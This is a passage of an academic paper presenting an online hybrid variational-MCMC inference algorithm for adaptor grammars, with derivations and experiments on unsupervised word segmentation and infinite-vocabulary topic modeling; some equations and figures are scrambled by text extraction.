provides. Our inference algorithm for adaptor grammars starts with a variational algorithm similar to Cohen et al. (2010) and adds hybrid sampling within varia- tional inference (Section 3). This obviates the need for expensive preprocessing and is a necessary step to create an online algorithm for adaptor grammars. Our online extension (Section 4) processes exam- ples in small batches taken from a stream of data. As data arrive, the algorithm dynamically extends the underlying approximate posterior distributions as more data are observed. This makes the algo- rithm flexible, scalable, and amenable to datasets that cannot be examined exhaustively because of their size—e.g., terabytes of social media data ap- pear every second—or their nature—e.g., speech ac- quisition, where a language learner is limited to the bandwidth of the human perceptual system and can- not acquire data in a monolithic batch (Börschinger and Johnson, 2012). We show our approach’s scalability and effective- ness by applying our inference framework in Sec- tion 5 on two tasks: unsupervised word segmenta- tion and infinite-vocabulary topic modeling. 2 Background In this section, we review probabilistic context-free grammars and adaptor grammars. 2.1 Probabilistic Context-free Grammars Probabilistic context-free grammars (PCFG) de- fine probability distributions over derivations of a context-free grammar. We define a PCFG G to be a tuple 〈W ,N,R,S,θ〉: a set of terminals W , a set of nonterminals N, productions R, start sym- bol S ∈ N and a vector of rule probabilities θ. The rules that rewrite nonterminal c is R(c). For a more complete description of PCFGs, see Manning and Schütze (1999). PCFGs typically use nonterminals with a syntactic interpretation. A sequence of terminals (the yield) is generated by recursively rewriting nonterminals as sequences of child symbols (either a nonterminal or a symbol). This builds a hierarchical phrase-tree structure for every yield. For example, a nonterminal VP represents a verb phrase, which probabilistically rewrites into a se- quence of nonterminals V, N (corresponding to verb and noun) using the production rule VP → V N. Both nonterminals can be further rewritten. Each nonterminal has a multinomial distribution over ex- pansions; for example, a multinomial for nonter- minal N would rewrite as “cake”, with probability θN→cake = 0.03. Rewriting terminates when the derivation has reached a terminal symbol such as “cake” (which does not rewrite). While PCFGs are used both in the supervised set- ting and in the unsupervised setting, in this paper we assume an unsupervised setting, in which only terminals are observed. Our goal is to predict the underlying phrase-structure tree. 2.2 Adaptor Grammars PCFGs assume that the rewriting operations are in- dependent given the nonterminal. This context- freeness assumption often is too strong for modeling natural language. Adaptor grammars break this independence as- sumption by transforming a PCFG’s distribution over Algorithm 1 Generative Process 1: For nonterminals c ∈ N, draw rule probabilities θc ∼ Dir(αc) for PCFG G. 2: for adapted nonterminal c in c1, . . . ,c|M| do 3: Draw grammaton Hc ∼ PYGEM(ac,bc,Gc) according to Equation 1, where Gc is defined by the PCFG rules R. 4: For i ∈ {1, . . . ,D}, generate a phrase-structure tree tS,i using the PCFG rules R(e) at non-adapted nonterminal e and the grammatons Hc at adapted nonterminals c. 5: The yields of trees t1, . . . , tD are observations x1, . . . ,xD. trees Gc rooted at nonterminal c into a richer distri- bution Hc over the trees headed by a nonterminal c, which is often referred to as the grammaton. A Pitman-Yor Adaptor grammar (PYAG) forms the adapted tree distributions Hc using a Pitman-Yor process (Pitman and Yor, 1997, PY), a generalization of the Dirichlet process (Ferguson, 1973, DP).1 A draw Hc ≡ (πc,zc) is formed by the stick break- ing process (Sudderth and Jordan, 2008, PYGEM) parametrized by scale parameter a, discount factor b, and base distribution Gc: π′k ∼Beta(1 − b,a + kb), zk ∼Gc, πk ≡π′k ∏k−1 j=1 (1 −π ′ j), H ≡ ∑ k πkδzk. (1) Intuitively, the distribution Hc is a discrete recon- struction of the atoms sampled from Gc—hence, reweights Gc. Grammaton Hc assigns non-zero stick-breaking weights π to a countably infinite number of parse trees z. We describe learning these grammatons in Section 3. More formally, a PYAG is a quintuple A = 〈G,M,a,b,α〉 with: a PCFG G; a set of adapted nonterminals M ⊆ N; Pitman-Yor process param- eters ac,bc at each adaptor c ∈ M and Dirichlet parameters αc for each nonterminal c ∈ N. We also assume an order on the adapted nonterminals, c1, . . . ,c|M| such that cj is not reachable from ci in a derivation if j > i.2 Algorithm 1 describes the generative process of an adaptor grammar on a set of D observed sen- tences x1, . . . ,xD. 1Adaptor grammars, in their general form, do not have to use the Pitman-Yor process but have only been used with the Pitman-Yor process. 2This is possible because we assume that recursive nonter- minals are not adapted. Given a PYAG A, the joint probability for a set of sentences X and its collection of trees T is p(X,T ,π,θ,z|A) = ∏ c∈M p(πc|ac,bc)p(zc|Gc) · ∏ c∈N p(θc|αc) ∏ xd∈X p(xd, td|θ,π,z), where xd and td represent the dth observed string and its corresponding parse. The multinomial PCFG parameter θc is drawn from a Dirichlet distribution at nonterminal c ∈ N. At each adapted nontermi- nal c ∈ M, the stick-breaking weights πc are drawn from a PYGEM (Equation 1). Each weight has an as- sociated atom zc,i from base distribution Gc, a sub- tree rooted at c. The probability p(xd, td |θ,π,z) is the PCFG likelihood of yield xd with parse tree td. Adaptor grammars require a base PCFG such that it does not have recursive adapted nonterminals, i.e., there cannot be a path in a derivation from a given adapted nonterminal to a second appearance of that adapted nonterminal. 3 Hybrid Variational-MCMC Inference Discovering the latent variables of the model—trees, adapted probabilities, and PCFG rules—is a problem of posterior inference given observed data. Previ- ous approaches use MCMC (Johnson et al., 2006) or variational inference (Cohen et al., 2010). MCMC discovers the support of nonparametric models during the inference, but does not scale to larger datasets (due to tight coupling of variables). Variational inference, however, is inherently paral- lel and easily amendable to online inference, but re- quires preprocessing to discover the adapted produc- tions. We combine the best of both worlds and pro- pose a hybrid variational-MCMC inference algorithm for adaptor grammars. Variational inference posits a variational distribu- tion over the latent variables in the model; this in turn induces an “evidence lower bound” (ELBO, L) as a function of a variational distribution q, a lower bound on the marginal log-likelihood. Variational inference optimizes this objective function with re- spect to the parameters that define q. In this section, we derive coordinate-ascent up- dates for these variational parameters. A key math- ematical component is taking expectations with re- spect to the variational distribution q. We strategi- cally use MCMC sampling to compute the expecta- tion of q over parse trees z. Instead of explicitly computing the variational distribution for all param- eters, one can sample from it. This produces a sparse approximation of the variational distribution, which improves both scalability and performance. Sparse distributions are easier to store and transmit in im- plementations, which improves scalability. Mimno et al. (2012) also show that sparse representations improve performance. Moreover, because it can flexibly adjust its support, it is a necessary prereq- uisite to online inference (Section 4). 3.1 Variational Lower Bound We posit a mean-field variational distribution: q(π,θ,T |γ,ν,φ) = ∏ c∈M ∏∞ i=1 q(π ′ c,i|ν 1 c,i,ν 2 c,i) · ∏ c∈N q(θc|γc) ∏ xd∈X q(td|φd), (2) where π′c,i is drawn from a variational Beta distri- bution parameterized by ν1c,i,ν 2 c,i; and θc is from a variational Dirichlet prior γc ∈ R |R(c)| + . Index i ranges over a possibly infinite number of adapted rules. The parse for the dth observation, td is mod- eled by a multinomial φd, where φd,i is the proba- bility generating the ith phrase-structure tree td,i. The variational distribution over latent variables induces the following ELBO on the likelihood: L(z,π,θ,T ,D; a,b,α) = H[q(θ,π,T )] + ∑ c∈N Eq[log p(θc|αc)] (3) + ∑ c∈M ∑∞ i=1 Eq[log p(π ′ c,i|ac,bc)] + ∑ c∈M ∑∞ i=1 Eq[log p(zc,i |π,θ)] + ∑ xd∈X Eq[log p(xd, td |π,θ,z)], where H[•] is the entropy function. To make this lower bound tractable, we truncate the distribution over π to a finite set (Blei and Jor- dan, 2005) for each adapted nonterminal c ∈ M, i.e., π′c,Kc ≡ 1 for some index Kc. Because the atom weights πk are deterministically defined by Equa- tion 1, this implies that πc,i is zero beyond index Kc. Each weight πc,i is associated with an atom zc,i, a subtree rooted at c. We call the ordered set of zc,i the truncated nonterminal grammaton (TNG ). Each adapted nonterminal c ∈ M has its own TNGc. The ith subtree in TNGc is denoted TNGc(i). In the rest of this section, we describe approxi- mate inference to maximize L. The most impor- tant update is φd,i, which we update using stochastic MCMC inference (Section 3.2). Past variational ap- proaches for adaptor grammars (Cohen et al., 2010) rely on a preprocessing step and heuristics to define a static TNG . In contrast, our model dynamically discovers trees. The TNG grows as the model sees more data, allowing online updates (Section 4). The remaining variational parameters are opti- mized using expected counts of adaptor grammar rules. These expected counts are described in Sec- tion 3.3, and the variational updates for the vari- ational parameters excluding φd,i are described in Section 3.4. 3.2 Stochastic MCMC Inference Each observation xd has an associated variational multinomial distribution φd over trees td that can yield observation xd with probability φd,i. Hold- ing all other variational parameters fixed, the coordinate-ascent update (Mimno et al., 2012; Bishop, 2006) for φd,i is φd,i ∝ exp{E ¬φd q [log p(td,i|xd,π,θ,z)]}, (4) where φd,i is the probability generating the ith phrase-structure tree td,i and E ¬φd q [•] is the expec- tation with respect to the variational distribution q, excluding the value of φd. Instead of computing this expectation explicitly, we turn to stochastic variational inference (Mimno et al., 2012; Hoffman et al., 2013) to sample from this distribution. This produces a set of sampled trees σd ≡ {σd,1, . . . ,σd,k}. From this set of trees we can approximate our variational distribution over trees φ using the empirical distribution σd, i.e., φd,i ∝ I[σd,j = td,i,∀σd,j ∈ σd]. (5) This leads to a sparse approximation of variational distribution φ.3 Previous inference strategies (Johnson et al., 2006; Börschinger and Johnson, 2012) for adaptor grammars have used sampling. The adaptor gram- mar inference methods use an approximate PCFG to emulate the marginalized Pitman-Yor distributions 3In our experiments, we use ten samples. at each nonterminal. Given this approximate PCFG, we can then sample a derivation z for string x from the possible trees (Johnson et al., 2007). Sampling requires a derived PCFG G′ that approx- imates the distribution over tree derivations condi- tioned on a yield. It includes the original PCFG rules R = {c → β} that define the base distribution and the new adapted productions R′ = {c ⇒ z,z ∈ TNGc}. Under G′, the probability θ′ of adapted pro- duction c ⇒ z is log θ′c⇒z =   Eq[log πc,i], if TNGc(i) = z Eq[log πc,Kc ] + Eq[log θc⇒z], otherwise (6) where Kc is the truncation level of TNGc and πc,Kc represents the left-over stick weights in the stick- breaking process for adaptor c ∈ M. θc⇒z repre- sents the probability of generating tree c ⇒ z under the base distribution. See also Cohen (2011). The expectation of the Pitman-Yor multinomial πc,i under the truncated variational stick-breaking distribution is Eq[log πa,i] = Ψ(ν1a,i) − Ψ(ν 1 a,i + ν 2 a,i) (7) + ∑i−1 j=1(Ψ(ν 2 a,j) − Ψ(ν 1 a,j + ν 2 a,j)), and the expectation of generating the phrase- structure tree a ⇒ z based on PCFG productions under the variational Dirichlet distribution is Eq[log θa⇒z] = ∑ c→β∈a⇒z ( Ψ(γc→β) (8) − Ψ( ∑ c→β′∈Rc γc→β′ ) ) where Ψ(•) is the digamma function, and c → β ∈ a ⇒ z represents all PCFG productions in the phrase-structure tree a ⇒ z. This PCFG can compose arbitrary subtrees and thus discover new trees that better describe the data, even if those trees are not part of the TNG . This is equivalent to creating a “new table” in MCMC in- ference and provides truncation-free variational up- dates (Wang and Blei, 2012) by sampling a unseen subtree with adapted nonterminal c ∈ M at the root. This frees our model from preprocessing to initial- ize truncated grammatons in Cohen et al. (2010). This stochastic approach has the advantage of creat- ing sparse distributions (Wang and Blei, 2012): few unique trees will be represented. S→AB B→{a,b,c} A→B B a B b Grammar Seating Assignments (nonterminal A) Yield Parse Counts ca B cA S B a New Seating B a B b B c h(A →c) +=1 g(B →c) +=1 g(B →a) +=1 ab B aA S B b B a B b B a h(A →a) +=1 g(B →a) +=1 g(B →b) +=1 ba B bA S B a B a B b f(A →b) +=1 g(B →a) +=1 Figure 1: Given an adaptor grammar, we sample derivations given an approximate PCFG and show how these affect counts. The sampled derivations can be understood via the Chinese restaurant metaphor (Johnson et al., 2006). Existing cached rules (elements in the TNG ) can be thought of as occupied ta- bles; this happens in the case of the yield “ba”, which increases counts for unadapted rules g and for entries in TNGA, f. For the yield “ca”, there is no appropriate entry in the TNG , so it must use the base distribution, which corresponds to sitting at a new table. This generates counts for g, as it uses the unadapted rule and for h, which represents entries that could be included in the TNG in the future. The final yield, “ab”, shows that even when compatible entries are in the TNG , it might still create a new table, changing the underlying base distribution. Parallelization As noted in Cohen et al. (2010), the inside-outside algorithm dominates the runtime of every iteration, both for sampling and variational inference. However, unlike MCMC, variational in- ference is highly parallelizable and requires fewer synchronizations per iteration (Zhai et al., 2012). In our approach, both inside algorithms and sampling process can be distributed, and those counts can be aggregated afterwards. In our implementation, we use multiple threads to parallelize tree sampling. 3.3 Calculating Expected Rule Counts For every observation xd, the hybrid approach pro- duces a set of sampled trees, each of which contains three types of productions: adapted rules, original PCFG rules, and potentially adapted rules. The last set is most important, as these are new rules dis- covered by the sampler. These are explained using the Chinese restaurant metaphor in Figure 1. The multiset of all adapted productions is M(td,i) and the multiset of non-adapted productions that gener- ate tree td,i is N(td,i). We compute three counts: 1: f is the expected number of productions within the TNG . It is the sum over the probability of a tree td,k times the number of times an adapted production appeared in td,k, fd(a ⇒ za,i) =∑ k ( φd,k |a ⇒ za,i : a ⇒ za,i ∈ M(td,k)|︸︷︷︸ count of rule a ⇒ za,i in tree td,k ) . 2: g is the expected counts of PCFG productions R that defines the base distribution of the adaptor grammar, gd(a → β) =∑ k (φd,k |a → β : a → β ∈ N(td,k)|) . 3: Finally, a third set of productions are newly dis- covered by the sampler and not in the TNG . These subtrees are rules that could be adapted, with expected counts hd(c ⇒ zc,i) =∑ k (φd,k |c ⇒ zc,i : c ⇒ zc,i /∈ M(td,k)|) . These subtrees—lists of PCFG rules sampled from Equation 6—correspond to adapted pro- ductions not yet present in the TNG . 3.4 Variational Updates Given the sparse vectors φ sampled from the hybrid MCMC step, we update all variational parameters as γa→β =αa→β + ∑ xd∈X gd(a → β) + ∑ b∈M ∑Kb i=1 n(a → β,zb,i), ν1a,i =1 − ba + ∑ xd∈X fd(a ⇒ za,i) + ∑ b∈M ∑Kb k=1 n(a ⇒ za,i,zb,k), ν2a,i =aa + iba + ∑ xd∈X ∑Ka j=1 fd(a ⇒ za,j) + ∑ b∈M ∑Kb k=1 ∑Ka j=1 n(a ⇒ za,j,zb,k), where n(r,t) is the expected number of times pro- duction r is in tree t, estimated during sampling. Hyperparameter Update We update our PCFG hyperparameter α, PYGEM hyperparameters a and b as in Cohen et al. (2010). 4 Online Variational Inference Online inference for probabilistic models requires us to update our posterior distribution as new observa- tions arrive. Unlike batch inference algorithms, we do not assume we always have access to the entire dataset. Instead, we assume that observations arrive in small groups called minibatches. The advantage of online inference is threefold: a) it does not re- quire retaining the whole dataset in memory; b) each online update is fast; and c) the model usually con- verges faster. All of these make adaptor grammars scalable to larger datasets. Our approach is based on the stochastic varia- tional inference for topic models (Hoffman et al., 2013). This inference strategy uses a form of stochastic gradient descent (Bottou, 1998): using the gradient of the ELBO, it finds the sufficient statistics necessary to update variational parameters (which are mostly expected counts calculated using the inside-outside algorithm), and interpolates the result with the current model. We assume data arrive in minibatches B (a set of sentences). We accumulate expected counts f̃(l)(a ⇒ za,i) =(1 − �) · f̃(l−1)(a ⇒ za,i) (9) + � · |X||Bl| ∑ xd∈Bl fd(a ⇒ za,i), g̃(l)(a → β) =(1 − �) · g̃(l−1)(a → β) (10) + � · |X||Bl| ∑ xd∈Bl gd(a → β), with decay factor � ∈ (0, 1) to guarantee conver- gence. We set it to � = (τ + l)−κ, where l is the minibatch counter. The decay inertia τ prevents pre- mature convergence, and decay rate κ controls the speed of change in sufficient statistics (Hoffman et al., 2010). We recover batch variational approach when B = D and κ = 0. The variables f̃(l) and g̃(l) are accumulated suffi- cient statistics of adapted and unadapted productions after processing minibatch Bl. They update the ap- proximate gradient. The updates for variational pa- rameters become γa→β =αa→β + g̃ (l)(a → β) (11) + ∑ b∈M ∑Kb i=1 n(a → β,zb,i), ν1a,i =1 − ba + f̃ (l)(a ⇒ za,i) (12) + ∑ b∈M ∑Kb k=1 n(a ⇒ za,i,zb,k), ν2a,i =aa + iba + ∑Ka j=1 f̃ (l)(a ⇒ za,j) (13) + ∑ b∈M ∑Kb k=1 ∑Ka j=1 n(a ⇒ za,j,zb,k), where Ka is the size of the TNG at adaptor a ∈ M. 4.1 Refining the Truncation As we observe more data during inference, our TNG s need to change. New rules should be added, useless rules should be removed, and derivations for existing rules should be updated. In this section, we describe heuristics for performing each of these operations. Adding Productions Sampling can identify pro- ductions that are not adapted but were instead drawn from the base distribution. These are candidates for the TNG . For every nonterminal a, we add these potentially adapted productions to TNGa after each minibatch. The count associated with candidate pro- ductions is now associated with an adapted produc- tion, i.e., the h count contributes to the relevant f count. This mechanism dynamically expands TNGa. Sorting and Removing Productions Our model does not require a preprocessing step to initialize the TNG s, rather, it constructs and expands all TNG s on the fly. To prevent the TNG from growing unwieldy, we prune TNG after every u minibatches. As a re- sult, we need to impose an ordering over all the parse trees in the TNG . The underlying PYGEM distribu- tion implicitly places an ranking over all the atoms according to their corresponding sufficient statis- tics (Kurihara et al., 2007), as shown in Equation 9. It measures the “usefulness” of every adapted pro- duction throughout inference process. In addition to accumulated sufficient statistics, Cohen et al. (2010) add a secondary term to discour- age short constituents (Mochihashi et al., 2009). We impose a reward term for longer phrases in addition to f̃ and sort all adapted productions in TNGa using the ranking score Λ(a ⇒ za,i) = f̃(l)(a ⇒ za,i) · log(� · |s| + 1), where |s| is the number of yields in production a ⇒ za,i. Because � decreases each minibatch, the reward for long phrases diminishes. This is similar to an annealed version of Cohen et al. (2010)—where the reward for long phrases is fixed, see also Mochihashi et al. (2009). After sorting, we remove all but the top Ka adapted productions. Rederiving Adapted Productions For MCMC in- ference, Johnson and Goldwater (2009) observe that atoms already associated with a yield may have trees Algorithm 2 Online inference for adaptor grammars 1: Random initialize all variational parameters. 2: for minibatch of l = 1,2, . . . do 3: Construct approximate PCFG θ′ of A (Equation 6). 4: for input sentence d = 1,2, . . . ,Dl do 5: Accumulate inside probabilities from approximate PCFG θ′. 6: Sample phrase-structure trees σ and update the tree distribution φ (Equation 5). 7: For every adapted nonterminal c, append adapted pro- ductions to TNGc. 8: Accumulate sufficient statistics (Equations 9 and 10). 9: Update γ, ν1, and ν2 (Equations 11-13). 10: Refine and prune the truncation every u minibatches. that do not explain their yield well. They propose ta- ble label resampling to rederive yields. In our approach this is equivalent to “mutating” some derivations in a TNG . After pruning rules ev- ery u minibatches, we perform table label resam- pling for adapted nonterminals from general to spe- cific (i.e., a topological sort). This provides better expected counts n(r,•) for rules used in phrase- structure subtrees. Empirically, we find table la- bel resampling only marginally improves the word- segmentation result. Initialization Our inference begins with random variational Dirichlets and empty TNG s, which obvi- ates the preprocessing step in Cohen et al. (2010). Our model constructs and expands all TNG s on the fly. It mimics the incremental initialization of John- son and Goldwater (2009). Algorithm 2 summarizes the pseudo-code of our online approach. 4.2 Complexity Inside and outside calls dominate execution time for adaptor grammar inference. Variational ap- proaches compute inside-outside algorithms and es- timate the expected counts for every possible tree derivation (Cohen et al., 2010). For a dataset with D observations, variational inference requires O ( DI ) calls to inside-outside algorithm, where I is the number of iterations, typically in the tens. In contrast, MCMC only needs to accumulate in- side probabilities, and then sample a tree deriva- tion (Chappelier and Rajman, 2000). The sampling step is negligible in processing time compared to the inside algorithm. MCMC inference requires O ( DI ) calls to the inside algorithm—hence every iteration co ll oc at io n SENT 7→ COLLOC SENT 7→ COLLOC SENT COLLOC 7→ WORDS un ig ra m WORDS 7→ WORD WORDS 7→ WORD WORDS WORD 7→ CHARS CHARS 7→ CHAR CHARS 7→ CHAR CHARS CHAR 7→ ? In fV oc L D A SENT 7→ DOCj j=1, 2, . . . D DOCj 7→−j TOPICi i=1, 2, . . . K TOPICi 7→ WORD WORD 7→ CHARS CHARS 7→ CHAR CHARS 7→ CHAR CHARS CHAR 7→ ? Table 1: Grammars used in our experiments. The nonterminal CHAR is a non-adapted rule that expands to all characters used in the data, sometimes called pre-terminals. Adapted nonter- minals are underlined. For the unigram grammar, only nonter- minal WORD is adapted; whereas for the collocation grammar, both nonterminals WORD and COLLOC are adapted. For the IN- FVOC LDA grammar, D is the total number of documents and K is the number of topics. Therefore, j ranges over {1, . . . ,D} and i ranges over {1, . . . ,K}. is much faster than variational approach—but I is usually on the order of thousands. Likewise, our hybrid approach also only needs the less expensive inside algorithm to sample trees. And while each iteration is less expensive, our ap- proach can achieve reasonable results with only a single pass through the data. And thus only requires O(D) calls to the inside algorithm. Because the inside-outside algorithm is funda- mental to each of these algorithms, we use it as a common basis for comparison across different im- plementations. This is over-generous to variational approaches, as the full inside-outside computation is more expensive than the inside probability computa- tion required for sampling in MCMC and our hybrid approach. 5 Experiments and Discussion We implement our online adaptor grammar model (ONLINE) in Python4 and compare it against both MCMC (Johnson and Goldwater, 2009, MCMC) and the variational inference (Cohen et al., 2010, VARI- ATIONAL). We use the latest implementation of MCMC sampler for adaptor grammars5 and simulate the variational approach using our implementation. For MCMC approach, we use the best settings re- ported in Johnson and Goldwater (2009) with incre- mental initialization and table label resampling. 4Available at http://www.umiacs.umd.edu/˜zhaike/. 5 http://web.science.mq.edu.au/˜mjohnson/code/ py-cfg-2013-02-25.tgz Model and Settings ctb7 pku cityu unigram collocation unigram collocation unigram collocation M C M C 500 iter 72.70 (2.81) 50.53 (2.82) 72.01 (2.82) 49.06 (2.81) 74.19 (3.55) 63.14 (3.53) 1000 iter 72.65 (2.83) 62.27 (2.79) 71.81 (2.81) 62.47 (2.77) 74.37 (3.54) 70.62 (3.51) 1500 iter 72.17 (2.80) 69.65 (2.77) 71.46 (2.80) 70.20 (2.73) 74.22 (3.54) 72.33 (3.50) 2000 iter 71.75 (2.79) 71.66 (2.76) 71.04 (2.79) 72.55 (2.70) 74.01 (3.53) 73.15 (3.48) O N L IN E κ τ KWord = 30k KColloc = 100k KWord = 40k KColloc = 120k KWord = 50k KColloc = 150K 0.6 32 70.17 (2.84) 68.43 (2.77) 69.93 (2.89) 68.09 (2.71) 72.59 (3.62) 69.27 (3.61) 128 72.98 (2.72) 65.20 (2.81) 72.26 (2.63) 65.57 (2.83) 74.73 (3.40) 64.83 (3.62) 512 72.76 (2.78) 56.05 (2.85) 71.99 (2.74) 58.94 (2.94) 73.68 (3.60) 60.40 (3.70) 0.8 32 71.10 (2.77) 70.84 (2.76) 70.31 (2.78) 70.91 (2.71) 73.12 (3.60) 71.89 (3.50) 128 72.79 (2.64) 70.93 (2.63) 72.08 (2.62) 72.02 (2.63) 74.62 (3.45) 72.28 (3.51) 512 72.82 (2.58) 68.53 (2.76) 72.14 (2.58) 70.07 (2.69) 74.71 (3.37) 72.58 (3.49) 1.0 32 69.98 (2.87) 70.71 (2.63) 69.42 (2.84) 71.45 (2.67) 73.18 (3.59) 72.42 (3.45) 128 71.84 (2.72) 71.29 (2.58) 71.29 (2.67) 72.56 (2.61) 73.23 (3.39) 72.61 (3.41) 512 72.68 (2.62) 70.67 (2.60) 71.86 (2.63) 71.39 (2.66) 74.45 (3.41) 72.88 (3.38) VARIATIONAL 69.83 (2.85) 67.78 (2.75) 67.82 (2.80) 66.97 (2.75) 70.47 (3.72) 69.06 (3.69) Table 2: Word segmentation accuracy measured by word token F1 scores and negative log-likelihood on held-out test dataset in the brackets (lower the better, on the scale of 106) for our ONLINE model against MCMC approach (Johnson et al., 2006) on various dataset using the unigram and collocation grammar.7 40 50 60 70 80 1e+03 1e+04 1e+05 1e+06 1e+07 # of inside−outside function calls f− 1 s co re model mcmc online variational (a) unigram grammar. 30 40 50 60 70 80 1e+03 1e+04 1e+05 1e+06 1e+07 # of inside−outside function calls f− 1 s co re model mcmc online variational (b) collocation grammar. Figure 2: Word segmentation accuracy measured by word token F1 scores on brent corpus of three approaches against number of inside-outside function call using unigram (upper) and collo- cation (lower) grammars in Table 1.6 6Our ONLINE settings are batch size B = 20, decay inertia τ = 128, decay rate κ = 0.6 for unigram grammar; and mini- batch size B = 5, decay inertia τ = 256, decay rate κ = 0.8 for collocation grammar. TNG s are refined at interval u = 50. Truncation size is set to KWord = 1.5k and KColloc = 3k. The settings are chosen from cross validation. We observe simi- lar behavior under κ = {0.7,0.9,1.0}, τ = {32,64,512}, B = {10,50} and u = {10,20,100}. 7For ONLINE inference, we parallelize each minibatch with four threads with settings: batch size B = 100 and TNG refine- ment interval u = 100. ONLINE approach runns for two passes over datasets. VARIATIONAL runs fifty iterations, with the same truncation level as in ONLINE. For negative log-likelihood eval- uation, we train the model on a random 70% of the data, and hold out the rest for testing. We observe similar behavior for 5.1 Word Segmentation We evaluate our online adaptor grammar on the task of word segmentation, which focuses on identify- ing word boundaries from a sequence of characters. This is especially the case for Chinese, since char- acters are written in sequence without word bound- aries. We first evaluate all three models on the stan- dard Brent version of the Bernstein-Ratner cor- pus (Bernstein-Ratner, 1987; Brent and Cartwright, 1996, brent). The dataset contains 10k sentences, 1.3k distinct words, and 72 distinct characters. We compare the results on both unigram and colloca- tion grammars introduced in Johnson and Goldwater (2009) as listed in Table 1. Figure 2 illustrates the word segmentation ac- curacy in terms of word token F1-scores on brent against the number of inside-outside function calls for all three approaches using unigram and colloca- tion grammars. In both cases, our ONLINE approach converges faster than MCMC and VARIATIONAL ap- proaches, yet yields comparable or better perfor- mance when seeing more data. In addition to the brent corpus, we also evalu- ate three approaches on three other Chinese datasets compiled by Xue et al. (2005) and Emerson (2005):8 • Chinese Treebank 7.0 (ctb7): 162k sentences, 57k distinct words, 4.5k distinct characters; our model under κ = {0.7,0.9} and τ = {64,256}. 8We use all punctuation as natural delimiters (i.e., words cannot cross punctuation). • Peking University (pku): 183k sentences, 53k distinct words, 4.6k distinct characters; and • City University of Hong Kong (cityu): 207k sentences, 64k distinct words, and 5k distinct characters. We compare our inference method against other approaches on F1 score. While other unsupervised word segmentation systems are available (Mochi- hashi et al. (2009), inter alia),9 our focus is on a di- rect comparison of inference techniques for adaptor grammar, which achieve competitive (if not state-of- the-art) performance. Table 2 shows the word token F1-scores and neg- ative likelihood on held-out test dataset of our model against MCMC and VARIATIONAL. We randomly sample 30% of the data for testing and the rest for training. We compute the held-out likelihood of the most likely sampled parse trees out of each model.10 Our ONLINE approach consistently better segments words than VARIATIONAL and achieves comparable or better results than MCMC. For MCMC, Johnson and Goldwater (2009) show that incremental initialization—or online updates in general—results in more accurate word segmenta- tion, even though the trees have lower posterior probability. Similarly, our ONLINE approach initial- izes and learns them on the fly, instead of initializing the grammatons and parse trees for all data upfront as for VARIATIONAL. This uniformly outperforms batch initialization on the word segmentation tasks. 5.2 Infinite Vocabulary Topic Modeling Topic models often can be replicated using a care- fully crafted PCFG (Johnson, 2010). These pow- erful extensions can capture topical collocations and sticky topics; these embelishments could fur- ther improve NLP applications of simple unigram topic models such as word sense disambigua- tion (Boyd-Graber and Blei, 2007), part of speech 9Their results are not directly comparable: they use different subsets and assume different preprocessing. 10Note that this is only an approximation to the true held-out likelihood, since it is impossible to enumerate all the possible parse trees and hence compute the likelihood for a given sen- tence under the model. 11We train all models with 5 topics with settings: TNG re- finement interval u = 100, truncation size KTopic = 3k, and the mini-batch size B = 50. We observe a similar behavior under κ ∈{0.7,0.9} and τ ∈{64,256}. 32 128 512 50 60 70 50 60 70 50 60 70 0.6 0.8 1 1 10 10 0 10 00 1 10 10 0 10 00 1 10 10 0 10 00 # of passes over the dataset pm i inference infvoc mcmc online variational ⌧ : ⌧ : ⌧ :  70 60 50 70 60 50 70 60 50 32 128 512 50 60 70 50 60 70 50 60 70 0.6 0.8 1 1 10 10 0 10 00 1 10 10 0 10 00 1 10 10 0 10 00 # of passes over the dataset pm i inference infvoc mcmc online variational co he re nc e Figure 3: The average coherence score of topics on de-news datasets against INFVOC approach and other inference tech- niques (MCMC, VARIATIONAL) under different settings of de- cay rate κ and decay inertia τ using the InfVoc LDA grammar in Table 1. The horizontal axis shows the number of passes over the entire dataset.11 tagging (Toutanova and Johnson, 2008) or dialogue modeling (?). However, expressing topic models in adaptor grammars is much slower than traditional topic models, for which fast online inference (Hoff- man et al., 2010) is available. Zhai and Boyd-Graber (2013) argue that online inference and topic models violate a fundamental as- sumption in online algorithms: new words are intro- duced as more data are streamed to the algorithm. Zhai and Boyd-Graber (2013) introduce an infer- ence framework, INFVOC, to discover words from a Dirichlet process with a character n-gram base dis- tribution. We show that their complicated model and on- line inference can be captured and extended via an appropriate PCFG grammar and our online adap- tor grammar inference algorithm. Our extension to INFVOC generalizes their static character n-gram model, learning the base distribution (i.e., how words are composed from characters) from data. In contrast, their base distribution was learned from a dictionary as a preprocessing step and held fixed. This is an attractive testbed for our online infer- ence. Within a topic, we can verify that the words we discover are relevant to the topic and that new words rise in importance in the topic over time if they are relevant. For these experiments, we treat each token (with its associated document pseudo-word −j) as a single sentence, and each minibatch contains only one sentence (token). 12The plot is generated with truncation size KTopic = 2k, mini-batch size B = 1, truncation pruning interval u = 50, decay inertia τ = 256, and decay rate κ = 0.8. All PY hyper- parameters are optimized. new words added at corresponding minibatch minibatch-3k ... 2-union 3-wage ... 16-minist ... 18-year ... 21-bill ... 32-increas 33-tax ... 48-reform ... 58-lower ... 82-percent ... 95-committe ... 180-pension ... minibatch-8k 1-year 2-minist 3-tax 4-pension 5-reform ... 10-committe ... 12-percent ... 16-lower ... 19-increas ... 25-bill ... 42-union 43-wage ... 181-schroeder ... 436-deduct ... minibatch-19k 1-deduct 2-tax 3-year 4-pension 5-reform ... 7-minist ... 9-increas ... 11-committe ... 13-schroeder 14-percent ... 17-lower ... 23-bill ... 49-union ... 92-wage ... minibatch-20k 1-tax 2-year 3-reform 4-pension 5-minist 6-increas ... 9-schroeder ... 11-committe ... 19-percent ... 31-lower ... 49-bill ... 51-union ... 53-deduct ... 127-wage ... minibatch-10k 1-tax 2-reform 3-pension 4-year 5-minist 6-increas ... 8-lower ... 13-percent ... 30-committe ... 33-bill ... 106-wage ... 115-union ... 120-schroeder ... 530-deduct ... minibatch-1k 1-reform ... 5-increas ... 10-union ... 13-wage ... 47-percent ... 53-year ... 67-tax ... 70-minist ... 108-bill ... 164-lower pension committe ... schroeder affair ... minibatch-4k ... 4-percent 5-tax 6-reform ... 12-year 13-increas ... 16-wage ... 19-minist ... 22-union ... 49-lower ... 82-schroeder ... 90-bill ... 106-committe ... 229-pension ... deduct shop ... recess ... primarili ... minibatch-15k 1-tax 2-schroeder 3-year 4-reform 5-minist 6-pension ... 8-increas ... 13-lower ... 16-percent 17-committe ... 20-union ... 235-bill ... 272-wage ... 306-deduct ... recipi ... minibatch-17k 1-tax 2-year 3-reform 4-schroeder 5-increas 6-minist ... 9-pension ... 11-percent 